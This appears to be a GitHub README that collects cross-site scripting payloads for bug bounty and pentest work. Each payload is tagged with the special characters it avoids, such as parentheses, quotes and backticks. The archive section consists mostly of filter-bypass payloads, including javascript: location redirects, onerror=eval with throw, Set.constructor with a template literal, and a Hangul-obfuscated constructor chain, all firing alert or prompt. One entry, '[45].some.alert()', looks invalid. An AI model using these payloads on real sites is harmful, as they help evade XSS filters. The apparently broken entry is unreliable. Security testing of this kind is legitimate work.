XSS-Payload-without-Anything
XSS Payload without Anything.
What is XSS Payload without Anything
When I work for a company or on a bug bounty, an unexpected hurdle is protection (an XSS filter) against special characters in the JS (JavaScript) area. So I am devising a way to easily solve these problems, and this document is one part of that process.
Let's collect a lot of thoughts and solve our problems.
Concept
It is similar to "Payload all the things" in terms of collecting payloads, but I want to provide a list of payloads with special tags (without char, used char, other...). I plan to make it easy to search and to show which characters (or what the payloads are made of) are unusable.
format
without char: () , '
XSS Payload
// usedchar:
// author:
// description:
without char (Frequently filtered characters)
I have selected special characters that are often blocked.
( )
{ }
,
"
'
`
[ ]
\
/
;
+
.
=
(template): () {} , " ' backtick [] \ / ; + . =
Usage
on Github.com
- Ctrl + F >
- find your problem char
- XSS
on hahwul.com coming soon
Awesome payload
coming soon
Archive
without char: () , " backtick \ / [] {} .
location='JaVaScRiPt:prompt'+document.location.hash[1]+'45'+document.location.hash[2]
without char: () {} , " backtick [] / + .
onerror=eval;throw'alert\x2845\x29';
without char: !backtick
prompt`45`
without char: () {} , " backtick [] / ; + .
location='javaScriPt:alert\x2845\x29'
without char: " backtick \ / ; .
([,하,,,,훌]=[]+{},[한,글,페,이,,로,드,ㅋ,,,ㅎ]=[!!하]+!하+하.ㅁ)[훌+=하+ㅎ+ㅋ+한+글+페+훌+한+하+글][훌](로+드+이+글+한+'(45)')()
without char: {} , " ' backtick \ / ; + =
[45].some.alert()
without char: () {} , " ' [] \ / ; + =
Set.constructor`alert\x2845\x29`
Submit XSS Payloads
Add an issue using this form, or open a pull request
XSS Payload:
WithOut:
Description:
or ...
Tweet with me @hahwul